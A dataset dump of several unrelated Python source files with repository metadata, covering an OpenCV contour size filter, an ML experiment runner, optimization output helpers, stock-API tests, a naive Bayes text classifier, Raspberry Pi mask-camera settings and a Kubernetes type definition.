contours, key=lambda x: cv2.contourArea(x), reverse=True
):
area_ = cv2.contourArea(cnt)
if area_ < lt:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_RED, -1)
elif area_ > ut:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_BLUE, -1)
else:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_WHITE, -1)
wrapper.store_image(image=size_cnts, text="cnts_by_size_reversed")
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_RED, -1)
# Discarded contours borders
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_MAROON, 4)
# Kept contours
for cnt in contours:
area_ = cv2.contourArea(cnt)
if lt < area_ < ut:
cv2.drawContours(out_mask, [cnt], 0, 255, -1)
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_GREEN, -1)
else:
cv2.drawContours(out_mask, [cnt], 0, 0, -1)
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_RED, -1)
dbg_img = np.dstack(
(
cv2.bitwise_and(dbg_img[:, :, 0], mask),
cv2.bitwise_and(dbg_img[:, :, 1], mask),
cv2.bitwise_and(dbg_img[:, :, 2], mask),
)
)
# Discarded sizes
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
ipc.C_RED,
thickness=2,
)
# Kept sizes
for cnt in contours:
area_ = cv2.contourArea(cnt)
if lt < area_ < ut:
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
ipc.C_LIME,
thickness=2,
)
out_mask = cv2.bitwise_and(
out_mask,
mask,
)
# Apply ROIs if needed
rois = self.get_ipt_roi(
wrapper=wrapper,
roi_names=self.get_value_of("roi_names").replace(" ", "").split(","),
selection_mode=self.get_value_of("roi_selection_mode"),
)
if rois:
untouched_mask = regions.delete_rois(rois=rois, image=self.get_mask())
self.result = cv2.bitwise_or(
untouched_mask, regions.keep_rois(rois=rois, image=out_mask)
)
self.demo_image = cv2.bitwise_or(
dbg_img,
np.dstack((untouched_mask, untouched_mask, untouched_mask)),
)
else:
self.result = out_mask
self.demo_image = dbg_img
wrapper.store_image(image=self.result, text="filtered_contours")
wrapper.store_image(image=self.demo_image, text="tagged_contours")
res = True
else:
wrapper.store_image(wrapper.current_image, "current_image")
res = True
except Exception as e:
res = False
logger.exception(f"Filter contour by size FAILED, exception: {repr(e)}")
else:
pass
finally:
return res
@property
def name(self):
return "Filter contour by size"
@property
def package(self):
return "TPMP"
@property
def real_time(self):
return False
@property
def result_name(self):
return "mask"
@property
def output_kind(self):
return "mask"
@property
def use_case(self):
return [ipc.ToolFamily.MASK_CLEANUP]
@property
def description(self):
return """'Keep or descard contours according to their size"""
| 38.443223
| 107
| 0.429252
|
from ipso_phen.ipapi.base.ipt_abstract import IptBase
from ipso_phen.ipapi.tools import regions
import numpy as np
import cv2
import logging
logger = logging.getLogger(__name__)
from ipso_phen.ipapi.base import ip_common as ipc
class IptFilterContourBySize(IptBase):
def build_params(self):
self.add_enabled_checkbox()
self.add_spin_box(
name="min_threshold",
desc="Lower bound limit",
default_value=0,
minimum=0,
maximum=100000000,
hint="Only contours bigger than lower limit bound will be kept",
)
self.add_spin_box(
name="max_threshold",
desc="Upper bound limit",
default_value=100000000,
minimum=0,
maximum=100000000,
hint="Only contours smaller than lower limit bound will be kept",
)
self.add_roi_selector()
def process_wrapper(self, **kwargs):
wrapper = self.init_wrapper(**kwargs)
if wrapper is None:
return False
res = False
try:
if self.get_value_of("enabled") == 1:
mask = self.get_mask()
if mask is None:
logger.error(f"FAIL {self.name}: mask must be initialized")
return
lt, ut = self.get_value_of("min_threshold"), self.get_value_of(
"max_threshold"
)
contours = [
c
for c in ipc.get_contours(
mask=mask,
retrieve_mode=cv2.RETR_LIST,
method=cv2.CHAIN_APPROX_SIMPLE,
)
if cv2.contourArea(c, True) < 0
]
contours.sort(key=lambda x: cv2.contourArea(x), reverse=True)
colors = ipc.build_color_steps(step_count=len(contours))
dbg_img = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for clr, cnt in zip(colors, contours):
cv2.drawContours(dbg_img, [cnt], 0, clr, -1)
dbg_img = np.dstack(
(
cv2.bitwise_and(dbg_img[:, :, 0], mask),
cv2.bitwise_and(dbg_img[:, :, 1], mask),
cv2.bitwise_and(dbg_img[:, :, 2], mask),
)
)
wrapper.store_image(
image=dbg_img,
text="all_contours",
)
fnt = (cv2.FONT_HERSHEY_SIMPLEX, 0.6)
for cnt in contours:
area_ = cv2.contourArea(cnt)
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
if area_ > 0:
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
(255, 255, 255),
2,
)
wrapper.store_image(
image=dbg_img,
text="all_contours_with_sizes",
)
dbg_img = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
out_mask = np.zeros_like(mask)
size_cnts = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if area_ < lt:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_RED, -1)
elif area_ > ut:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_BLUE, -1)
else:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_WHITE, -1)
wrapper.store_image(image=size_cnts, text="cnts_by_size")
size_cnts = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for cnt in sorted(
contours, key=lambda x: cv2.contourArea(x), reverse=True
):
area_ = cv2.contourArea(cnt)
if area_ < lt:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_RED, -1)
elif area_ > ut:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_BLUE, -1)
else:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_WHITE, -1)
wrapper.store_image(image=size_cnts, text="cnts_by_size_reversed")
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_RED, -1)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_MAROON, 4)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if lt < area_ < ut:
cv2.drawContours(out_mask, [cnt], 0, 255, -1)
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_GREEN, -1)
else:
cv2.drawContours(out_mask, [cnt], 0, 0, -1)
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_RED, -1)
dbg_img = np.dstack(
(
cv2.bitwise_and(dbg_img[:, :, 0], mask),
cv2.bitwise_and(dbg_img[:, :, 1], mask),
cv2.bitwise_and(dbg_img[:, :, 2], mask),
)
)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
ipc.C_RED,
thickness=2,
)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if lt < area_ < ut:
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
ipc.C_LIME,
thickness=2,
)
out_mask = cv2.bitwise_and(
out_mask,
mask,
)
rois = self.get_ipt_roi(
wrapper=wrapper,
roi_names=self.get_value_of("roi_names").replace(" ", "").split(","),
selection_mode=self.get_value_of("roi_selection_mode"),
)
if rois:
untouched_mask = regions.delete_rois(rois=rois, image=self.get_mask())
self.result = cv2.bitwise_or(
untouched_mask, regions.keep_rois(rois=rois, image=out_mask)
)
self.demo_image = cv2.bitwise_or(
dbg_img,
np.dstack((untouched_mask, untouched_mask, untouched_mask)),
)
else:
self.result = out_mask
self.demo_image = dbg_img
wrapper.store_image(image=self.result, text="filtered_contours")
wrapper.store_image(image=self.demo_image, text="tagged_contours")
res = True
else:
wrapper.store_image(wrapper.current_image, "current_image")
res = True
except Exception as e:
res = False
logger.exception(f"Filter contour by size FAILED, exception: {repr(e)}")
else:
pass
finally:
return res
@property
def name(self):
return "Filter contour by size"
@property
def package(self):
return "TPMP"
@property
def real_time(self):
return False
@property
def result_name(self):
return "mask"
@property
def output_kind(self):
return "mask"
@property
def use_case(self):
return [ipc.ToolFamily.MASK_CLEANUP]
@property
def description(self):
return """'Keep or descard contours according to their size"""
| true
| true
|
1c4921e62a6001ff0f0f76cfce152834392f6e19
| 580
|
py
|
Python
|
run_gpulearn_yz_x.py
|
noskill/nips14-ssl
|
4c4aa624d6f666814f3c058141dd52cf7aabdee6
|
[
"MIT"
] | 496
|
2015-01-02T06:44:17.000Z
|
2022-03-17T22:02:34.000Z
|
run_gpulearn_yz_x.py
|
noskill/nips14-ssl
|
4c4aa624d6f666814f3c058141dd52cf7aabdee6
|
[
"MIT"
] | 6
|
2015-01-16T00:04:31.000Z
|
2018-06-25T07:02:26.000Z
|
run_gpulearn_yz_x.py
|
noskill/nips14-ssl
|
4c4aa624d6f666814f3c058141dd52cf7aabdee6
|
[
"MIT"
] | 184
|
2015-01-02T05:16:08.000Z
|
2021-04-08T10:31:42.000Z
|
import gpulearn_yz_x
import sys
if sys.argv[1] == 'svhn':
n_hidden = [500,500]
if len(sys.argv) == 4:
n_hidden = [int(sys.argv[2])]*int(sys.argv[3])
gpulearn_yz_x.main(dataset='svhn', n_z=300, n_hidden=n_hidden, seed=0, gfx=True)
elif sys.argv[1] == 'mnist':
n_hidden = (500,500)
if len(sys.argv) >= 4:
n_hidden = [int(sys.argv[2])]*int(sys.argv[3])
n_z = 50
if len(sys.argv) >= 5:
n_z = int(sys.argv[4])
gpulearn_yz_x.main(dataset='mnist', n_z=n_z, n_hidden=n_hidden, seed=0, gfx=True)
raise Exception("Unknown dataset")
| 30.526316
| 85
| 0.617241
|
import gpulearn_yz_x
import sys
if sys.argv[1] == 'svhn':
n_hidden = [500,500]
if len(sys.argv) == 4:
n_hidden = [int(sys.argv[2])]*int(sys.argv[3])
gpulearn_yz_x.main(dataset='svhn', n_z=300, n_hidden=n_hidden, seed=0, gfx=True)
elif sys.argv[1] == 'mnist':
n_hidden = (500,500)
if len(sys.argv) >= 4:
n_hidden = [int(sys.argv[2])]*int(sys.argv[3])
n_z = 50
if len(sys.argv) >= 5:
n_z = int(sys.argv[4])
gpulearn_yz_x.main(dataset='mnist', n_z=n_z, n_hidden=n_hidden, seed=0, gfx=True)
raise Exception("Unknown dataset")
| true
| true
|
1c4922310667808dfb15380c7f3590c83f9563ff
| 1,985
|
py
|
Python
|
process_data.py
|
ekhoda/optimization-tutorial
|
8847625aa49813823b47165c5f457294729459b6
|
[
"MIT"
] | 41
|
2019-03-07T17:03:51.000Z
|
2021-11-08T12:19:54.000Z
|
process_data.py
|
ekhoda/optimization-tutorial
|
8847625aa49813823b47165c5f457294729459b6
|
[
"MIT"
] | null | null | null |
process_data.py
|
ekhoda/optimization-tutorial
|
8847625aa49813823b47165c5f457294729459b6
|
[
"MIT"
] | 15
|
2018-11-15T11:30:51.000Z
|
2022-01-08T08:58:33.000Z
|
import pandas as pd
from helper import load_raw_data
def load_data():
return get_modified_data(load_raw_data())
def get_modified_data(input_df_dict):
# Our "parameters" table is very simple here. So, we can create a new dictionary
# for our parameters as follows or just modify our df a little in place.
# There shouldn't be any performance gain here to concern us, so I went with
# the dictionary. In the comment below, I also show the latter for illustration
# input_df_dict['parameters'].set_index('attribute', inplace=True)
input_param_dict = input_df_dict['parameters'].set_index('attribute')['value'].to_dict()
return input_df_dict, input_param_dict
# To keep things simple, there is a single module here for processing both input and output data
def _create_outputs_df(opt_series, cols, name, output_df_dict):
df = pd.DataFrame(data=opt_series, index=opt_series.index.values).reset_index()
df.columns = cols
output_df_dict[name] = df
def write_outputs(dict_of_variables, attr='varValue'):
"""
The outputs we want are very simple and can be achieved almost identically
in either modules. The only difference is in the attribute name of their
decision variable value.
In gurobi you get it by 'your_dv.x',
in pulp by 'your_dv.varValue',
in cplex by 'your_dv.solution_value'.
"""
output_df_dict = {}
cols = ['period', 'value']
for name, var in dict_of_variables.items():
opt_series = pd.Series({k + 1: getattr(v, attr) for k, v in var.items()})
_create_outputs_df(opt_series, cols, name, output_df_dict)
return output_df_dict
def write_outputs_xpress(dict_of_variables, model):
output_df_dict = {}
cols = ['period', 'value']
for name, var in dict_of_variables.items():
opt_series = pd.Series({k + 1: model.getSolution(v) for k, v in var.items()})
_create_outputs_df(opt_series, cols, name, output_df_dict)
return output_df_dict
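# --- Usage sketch (editor's addition): write_outputs with a stand-in variable
# class mimicking PuLP's .varValue attribute; 'production' is a hypothetical name.
if __name__ == "__main__":
    class _FakeVar:
        def __init__(self, v):
            self.varValue = v

    demo = write_outputs({"production": {0: _FakeVar(10.0), 1: _FakeVar(12.5)}})
    print(demo["production"])  # columns ['period', 'value']; periods start at 1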
| 37.45283
| 97
| 0.71738
|
import pandas as pd
from helper import load_raw_data
def load_data():
return get_modified_data(load_raw_data())
def get_modified_data(input_df_dict):
# the dictionary. In the comment below, I also show the latter for illustration
# input_df_dict['parameters'].set_index('attribute', inplace=True)
input_param_dict = input_df_dict['parameters'].set_index('attribute')['value'].to_dict()
return input_df_dict, input_param_dict
# To keep things simple, there is a single module here for processing both input and output data
def _create_outputs_df(opt_series, cols, name, output_df_dict):
df = pd.DataFrame(data=opt_series, index=opt_series.index.values).reset_index()
df.columns = cols
output_df_dict[name] = df
def write_outputs(dict_of_variables, attr='varValue'):
output_df_dict = {}
cols = ['period', 'value']
for name, var in dict_of_variables.items():
opt_series = pd.Series({k + 1: getattr(v, attr) for k, v in var.items()})
_create_outputs_df(opt_series, cols, name, output_df_dict)
return output_df_dict
def write_outputs_xpress(dict_of_variables, model):
output_df_dict = {}
cols = ['period', 'value']
for name, var in dict_of_variables.items():
opt_series = pd.Series({k + 1: model.getSolution(v) for k, v in var.items()})
_create_outputs_df(opt_series, cols, name, output_df_dict)
return output_df_dict
| true
| true
|
1c4922af46079adc1099dbedfdb026e3a72fa3a1
| 2,275
|
py
|
Python
|
tests/test_public_functions.py
|
staneslevski/WorldTradingDataPythonSDK
|
3460160acb8194bbc9bb1373e48b95e9d520c402
|
[
"MIT"
] | 12
|
2019-07-30T12:38:12.000Z
|
2022-01-15T10:05:47.000Z
|
tests/test_public_functions.py
|
staneslevski/WorldTradingDataPythonSDK
|
3460160acb8194bbc9bb1373e48b95e9d520c402
|
[
"MIT"
] | 2
|
2020-06-09T18:03:11.000Z
|
2021-06-01T23:57:47.000Z
|
tests/test_public_functions.py
|
staneslevski/WorldTradingDataPythonSDK
|
3460160acb8194bbc9bb1373e48b95e9d520c402
|
[
"MIT"
] | null | null | null |
from worldtradingdata.public.base import WorldTradingData
import worldtradingdata.public.base as wtd_lib
from .secure import api_token
# def test_world_trading_data_class():
# wtd = worldtradingdata(api_token)
# result = wtd.stock_search('AAPL')
# # print(result)
# assert type(result) == dict
# new_result = wtd.stock_search('AAPL', {'output': 'csv'})
# assert type(new_result) == str
# new_result = wtd.stock_search('AAPL', {'api_token': 'not_my_token'})
# assert type(result) == dict
def test_filter_unwanted_params():
params = {
'foo': 'bar',
'horrible': 'do no keep me'
}
unwanted_keys = ['horrible']
filtered = wtd_lib.filter_unwanted_params(params, unwanted_keys)
assert len(filtered) == 1
assert filtered == {'foo': 'bar'}
def filter_search_params():
params = {
'api_token': 'this is not my token',
'search_by': 'symbol'
}
filtered = wtd_lib.filter_search_params(params)
assert filtered == {'search_by': 'symbol'}
def test_reduce_list_to_string():
symbols_list = ['AAPL', 'GOOG']
symbols_string = 'GOOG,AAPL'
result = wtd_lib.reduce_list_to_string(symbols_list)
assert result == symbols_string
# def test_wtd_stock():
# wtd = worldtradingdata(api_token)
# result = wtd.stock(['AAPL'])
# assert type(result) == dict
# result = wtd.stock(['AAPL', 'GOOG'])
# assert type(result) == dict
# result = wtd.stock(['AAPL', 'GOOG'], {'output': 'csv'})
# assert type(result) == str
#
#
# def test_mutual_fund():
# wtd = worldtradingdata(api_token)
# res = wtd.mutual_fund(['AAAAX', 'AAADX', 'AAAGX'])
# assert type(res) == dict
# res = wtd.mutual_fund(['AAAAX', 'AAADX', 'AAAGX'], {'output': 'csv'})
# assert type(res) == str
# res = wtd.mutual_fund(['AAAAX', 'AAADX', 'AAAGX'], {'sort_by': 'name'})
# assert type(res) == dict
def test_intraday():
wtd = WorldTradingData(api_token)
symbol = 'aapl'
time_interval = 5
day_range = 2
res = wtd.intraday(symbol, time_interval, day_range)
assert type(res) == dict
assert 'symbol' in res.keys()
assert 'stock_exchange_short' in res.keys()
assert 'timezone_name' in res.keys()
assert 'intraday' in res.keys()
| 30.743243
| 77
| 0.639121
|
from worldtradingdata.public.base import WorldTradingData
import worldtradingdata.public.base as wtd_lib
from .secure import api_token
def test_filter_unwanted_params():
params = {
'foo': 'bar',
'horrible': 'do no keep me'
}
unwanted_keys = ['horrible']
filtered = wtd_lib.filter_unwanted_params(params, unwanted_keys)
assert len(filtered) == 1
assert filtered == {'foo': 'bar'}
def filter_search_params():
params = {
'api_token': 'this is not my token',
'search_by': 'symbol'
}
filtered = wtd_lib.filter_search_params(params)
assert filtered == {'search_by': 'symbol'}
def test_reduce_list_to_string():
symbols_list = ['AAPL', 'GOOG']
symbols_string = 'GOOG,AAPL'
result = wtd_lib.reduce_list_to_string(symbols_list)
assert result == symbols_string
def test_intraday():
wtd = WorldTradingData(api_token)
symbol = 'aapl'
time_interval = 5
day_range = 2
res = wtd.intraday(symbol, time_interval, day_range)
assert type(res) == dict
assert 'symbol' in res.keys()
assert 'stock_exchange_short' in res.keys()
assert 'timezone_name' in res.keys()
assert 'intraday' in res.keys()
| true
| true
|
1c4922b8a88085015e55a3d6c6e0df39358c9b9b
| 3,577
|
py
|
Python
|
DataAnalysis/day1_9/bayes.py
|
yunjung-lee/class_python_numpy
|
589817c8bbca85d70596e4097c0ece093b5353c3
|
[
"MIT"
] | null | null | null |
DataAnalysis/day1_9/bayes.py
|
yunjung-lee/class_python_numpy
|
589817c8bbca85d70596e4097c0ece093b5353c3
|
[
"MIT"
] | null | null | null |
DataAnalysis/day1_9/bayes.py
|
yunjung-lee/class_python_numpy
|
589817c8bbca85d70596e4097c0ece093b5353c3
|
[
"MIT"
] | null | null | null |
"""
1) 텍스트 -> 학습 -> 모델
2) 모델 -> 새로운 텍스트 입력 -> 분류 결과
"""
import math, sys
from konlpy.tag import Twitter
class BayesianFilter:
    def __init__(self):  # Java's this = Python's self; careful not to mistype __init__
        # print("constructor function") -- attributes bound in __init__ must be referenced with their full name (including self.)
        self.words = set()  # a set keeps only one copy even if data is duplicated
        self.word_dict = {}  # word counts per category
        self.category_dict = {}
    # morphological analysis of the received text
def split(self,text):
twitter = Twitter()
mailList = twitter.pos(text,norm=True, stem=True)
#print(mailList)
results =[]
for word in mailList:
if not word[1] in ['Josa','Eomi','Punctuation']:
results.append(word[0])
#print(results)
return results
    # inc_word: add a word to a category
    def inc_word(self,word,category): # create the category, then add the word to it
        # print(word,category) # "파격 세일 - 오늘까지 30% 할인합니다.", "광고"
        if not category in self.word_dict:
            self.word_dict[category]={} # a dictionary nested inside a dictionary
        if not word in self.word_dict[category]:
            self.word_dict[category][word] = 0 # nested dictionary notation
self.word_dict[category][word] += 1
self.words.add(word)
# # print("="*50)
# print(self.word_dict)
# # print("=" * 50)
# print(self.words)
def category_prob(self,category):
sum_categories = sum(self.category_dict.values())
        category_v = self.category_dict[category] # e.g. 5: documents belonging to the '광고' (ad) category
        return category_v / sum_categories
    # '광고' (ad) => returns 5/10, '중요' (important) => returns 5/10.
def score(self,words,category):
#words :['재고', '정리', '할인', '무료', '배송']
#category : '광고'
#print("score function : ", category)
score = math.log(self.category_prob(category))
print("스코어:",score)
for word in words:
score +=math.log(self.word_prob(word,category))
return score
    # compute the occurrence ratio of a word within a category
    def word_prob(self,word,category):
        n=self.get_word_count(word,category)+1 # occurrence count within the category
        d=sum(self.word_dict[category].values())+len(self.words) # word count of the category + total vocabulary size
        # print(n/d) # len(dict): prints the number of keys in the dictionary
        return n/d
    # d: total occurrences of words in the ad category + number of distinct words overall
# print(n)
def get_word_count(self,word,category):
if word in self.word_dict[category]:
return self.word_dict[category][word]
else:
return 0
#text='재고 , 정리 할인, 무료 배송'
def predict(self,text):
best_category = None
words =self.split(text)
score_list = []
max_score = -sys.maxsize
#print(words) #['재고', '정리', '할인', '무료', '배송']
for category in self.category_dict.keys():
score = self.score(words,category)
score_list.append((category,score))
if score> max_score:
max_score = score
best_category=category
return best_category,score_list
def fit(self,text,category):
        # read the text and train on it
word_list = self.split(text)
for word in word_list :
#print(word)
self.inc_word(word,category)
self.inc_category(category)
    # category counting part
def inc_category(self,category):
# print(category)
        if not category in self.category_dict: # if the category (ad, important) is not yet in category_dict
self.category_dict[category]=0
self.category_dict[category] +=1
# print(self.category_dict)
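
# Illustrative usage sketch (not part of the original file): following the
# docstring's two steps -- train on labeled texts, then classify a new one.
# The first sample text and both category labels come from the comments
# above; the second text is made up for illustration. konlpy (and a JVM)
# must be installed for BayesianFilter.split to work.
if __name__ == "__main__":
    bf = BayesianFilter()
    bf.fit(u"파격 세일 - 오늘까지 30% 할인합니다.", u"광고")
    bf.fit(u"오늘 회의 일정 안내입니다.", u"중요")
    best_category, score_list = bf.predict(u"재고 정리 할인, 무료 배송")
    print(best_category, score_list)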
| 33.12037
| 90
| 0.567515
|
import math, sys
from konlpy.tag import Twitter
class BayesianFilter:
    def __init__(self):
        self.words =set()
        self.word_dict={}
        self.category_dict={}
def split(self,text):
twitter = Twitter()
mailList = twitter.pos(text,norm=True, stem=True)
results =[]
for word in mailList:
if not word[1] in ['Josa','Eomi','Punctuation']:
results.append(word[0])
return results
    def inc_word(self,word,category):
        if not category in self.word_dict:
            self.word_dict[category]={}
        if not word in self.word_dict[category]:
            self.word_dict[category][word] = 0
        self.word_dict[category][word] += 1
self.words.add(word)
def category_prob(self,category):
sum_categories = sum(self.category_dict.values())
        category_v = self.category_dict[category]
        return category_v / sum_categories
def score(self,words,category):
score = math.log(self.category_prob(category))
print("스코어:",score)
for word in words:
score +=math.log(self.word_prob(word,category))
return score
def word_prob(self,word,category):
        n=self.get_word_count(word,category)+1
        d=sum(self.word_dict[category].values())+len(self.words)
        return n/d
def get_word_count(self,word,category):
if word in self.word_dict[category]:
return self.word_dict[category][word]
else:
return 0
def predict(self,text):
best_category = None
words =self.split(text)
score_list = []
max_score = -sys.maxsize
for category in self.category_dict.keys():
score = self.score(words,category)
score_list.append((category,score))
if score> max_score:
max_score = score
best_category=category
return best_category,score_list
def fit(self,text,category):
word_list = self.split(text)
for word in word_list :
self.inc_word(word,category)
self.inc_category(category)
def inc_category(self,category):
        if not category in self.category_dict:
            self.category_dict[category]=0
self.category_dict[category] +=1
| true
| true
|
1c4923a68f5b3aa7d928c0a1116e10e76c6838cc
| 52
|
py
|
Python
|
rl_trader/engine/rl_environment/types/test/env_account_types.test.py
|
AlexandreMahdhaoui/rl_trader
|
5bda02622c7e17c4e6f28a90c510cfe8f914f7a8
|
[
"Apache-2.0"
] | null | null | null |
rl_trader/engine/rl_environment/types/test/env_account_types.test.py
|
AlexandreMahdhaoui/rl_trader
|
5bda02622c7e17c4e6f28a90c510cfe8f914f7a8
|
[
"Apache-2.0"
] | null | null | null |
rl_trader/engine/rl_environment/types/test/env_account_types.test.py
|
AlexandreMahdhaoui/rl_trader
|
5bda02622c7e17c4e6f28a90c510cfe8f914f7a8
|
[
"Apache-2.0"
] | null | null | null |
# TODO: TokenWallet
# TODO: Wallets
# TODO: Order
| 8.666667
| 19
| 0.673077
| true
| true
|
|
1c4924a89870fba8aeb1a80cb094666a4e54672e
| 1,810
|
py
|
Python
|
PiCode/src/maskcam/settings.py
|
SilentByte/healthcam
|
70401073d6695196e2d3bc6c86e96e822f5d3f7f
|
[
"MIT"
] | 2
|
2020-07-14T22:36:38.000Z
|
2020-10-04T19:05:58.000Z
|
PiCode/src/maskcam/settings.py
|
SilentByte/healthcam
|
70401073d6695196e2d3bc6c86e96e822f5d3f7f
|
[
"MIT"
] | 1
|
2021-03-10T14:44:52.000Z
|
2021-03-10T14:44:52.000Z
|
PiCode/src/maskcam/settings.py
|
SilentByte/healthcam
|
70401073d6695196e2d3bc6c86e96e822f5d3f7f
|
[
"MIT"
] | 1
|
2020-06-13T20:19:13.000Z
|
2020-06-13T20:19:13.000Z
|
from knobs import Knob
from socket import gethostname
# Knobs are basically wrappers around os.getenv that add some niceties
CAMERA_NUMBER = Knob(env_name="CAMERA_NUMBER", default=0,
description="Raspberry Pi camera number according to "
"https://picamera.readthedocs.io/en/release-1.13/api_camera.html#picamera")
INVERT_CAMERA = Knob(env_name="CAMERA_INVERT", default=True, description="Vertical invert camera")
DEVICE_NAME = Knob(env_name="DEVICE_NAME", default=gethostname(), description="Device Name")
AWS_REGION = Knob(env_name="AWS_REGION", default='us-east-1', description="AWS region that your resources live in")
MODEL_ENDPOINT_NAME = Knob(env_name="AWS_MODEL_ENDPOINT_NAME", default=False,
description="AWS Model endpoint for CVEDIA Human Detector")
AWS_API_GATEWAY = Knob(env_name="AWS_API_GATEWAY", default="https://m5k4jhx1ka.execute-api.us-east-1.amazonaws.com/dev/", description="AWS API Gateway Endpoint")
MIN_PERCENTAGE_DIFF = Knob(env_name="MIN_PERCENTAGE_DIFF", default=50,
description="Minimum difference between frames to send")
PERSON_PERCENTAGE = Knob(env_name="PERSON_PERCENTAGE", default=10,
description="Minimum probability to consider it being a person")
NO_MASK_THRESHOLD = Knob(env_name="NO_MASK_THRESHOLD", default=50, description="Minimum threshold to measure no mask.")
OPEN_TIME = Knob(env_name="OPEN_TIME", default=5, description="Time to open door in seconds.")
DOOR_OUT_PIN = Knob(env_name="DOOR_OUT_PIN", default=35, description="Pin the door latch is connected to")
DOOR_OVERRIDE_BUTTON = Knob(env_name="DOOR_OVERRIDE_BUTTON", default=37,
description="Pin that the override button is connected to")
| 51.714286
| 161
| 0.726519
|
from knobs import Knob
from socket import gethostname
CAMERA_NUMBER = Knob(env_name="CAMERA_NUMBER", default=0,
description="Raspberry Pi camera number according to "
"https://picamera.readthedocs.io/en/release-1.13/api_camera.html#picamera")
INVERT_CAMERA = Knob(env_name="CAMERA_INVERT", default=True, description="Vertical invert camera")
DEVICE_NAME = Knob(env_name="DEVICE_NAME", default=gethostname(), description="Device Name")
AWS_REGION = Knob(env_name="AWS_REGION", default='us-east-1', description="AWS region that your resources live in")
MODEL_ENDPOINT_NAME = Knob(env_name="AWS_MODEL_ENDPOINT_NAME", default=False,
description="AWS Model endpoint for CVEDIA Human Detector")
AWS_API_GATEWAY = Knob(env_name="AWS_API_GATEWAY", default="https://m5k4jhx1ka.execute-api.us-east-1.amazonaws.com/dev/", description="AWS API Gateway Endpoint")
MIN_PERCENTAGE_DIFF = Knob(env_name="MIN_PERCENTAGE_DIFF", default=50,
description="Minimum difference between frames to send")
PERSON_PERCENTAGE = Knob(env_name="PERSON_PERCENTAGE", default=10,
description="Minimum probability to consider it being a person")
NO_MASK_THRESHOLD = Knob(env_name="NO_MASK_THRESHOLD", default=50, description="Minimum threshold to measure no mask.")
OPEN_TIME = Knob(env_name="OPEN_TIME", default=5, description="Time to open door in seconds.")
DOOR_OUT_PIN = Knob(env_name="DOOR_OUT_PIN", default=35, description="Pin the door latch is connected to")
DOOR_OVERRIDE_BUTTON = Knob(env_name="DOOR_OVERRIDE_BUTTON", default=37,
description="Pin that the override button is connected to")
| true
| true
|
1c4924bb20432bd7d11510e29208dac1453c8851
| 339
|
py
|
Python
|
kubernetes_typed/client/models/v2beta1_cross_version_object_reference.py
|
nikhiljha/kubernetes-typed
|
4f4b969aa400c88306f92560e56bda6d19b2a895
|
[
"Apache-2.0"
] | 22
|
2020-12-10T13:06:02.000Z
|
2022-02-13T21:58:15.000Z
|
kubernetes_typed/client/models/v2beta1_cross_version_object_reference.py
|
nikhiljha/kubernetes-typed
|
4f4b969aa400c88306f92560e56bda6d19b2a895
|
[
"Apache-2.0"
] | 4
|
2021-03-08T07:06:12.000Z
|
2022-03-29T23:41:45.000Z
|
kubernetes_typed/client/models/v2beta1_cross_version_object_reference.py
|
nikhiljha/kubernetes-typed
|
4f4b969aa400c88306f92560e56bda6d19b2a895
|
[
"Apache-2.0"
] | 2
|
2021-09-05T19:18:28.000Z
|
2022-03-14T02:56:17.000Z
|
# Code generated by `typeddictgen`. DO NOT EDIT.
"""V2beta1CrossVersionObjectReferenceDict generated type."""
from typing import TypedDict
V2beta1CrossVersionObjectReferenceDict = TypedDict(
"V2beta1CrossVersionObjectReferenceDict",
{
"apiVersion": str,
"kind": str,
"name": str,
},
total=False,
)
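
# Illustrative usage sketch (not part of the generated module): because the
# TypedDict is declared with total=False, every key is optional and partial
# dicts also type-check. The field values below are hypothetical.
example_ref: V2beta1CrossVersionObjectReferenceDict = {
    "apiVersion": "apps/v1",
    "kind": "Deployment",
    "name": "example-deployment",
}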
| 24.214286
| 60
| 0.690265
|
from typing import TypedDict
V2beta1CrossVersionObjectReferenceDict = TypedDict(
"V2beta1CrossVersionObjectReferenceDict",
{
"apiVersion": str,
"kind": str,
"name": str,
},
total=False,
)
| true
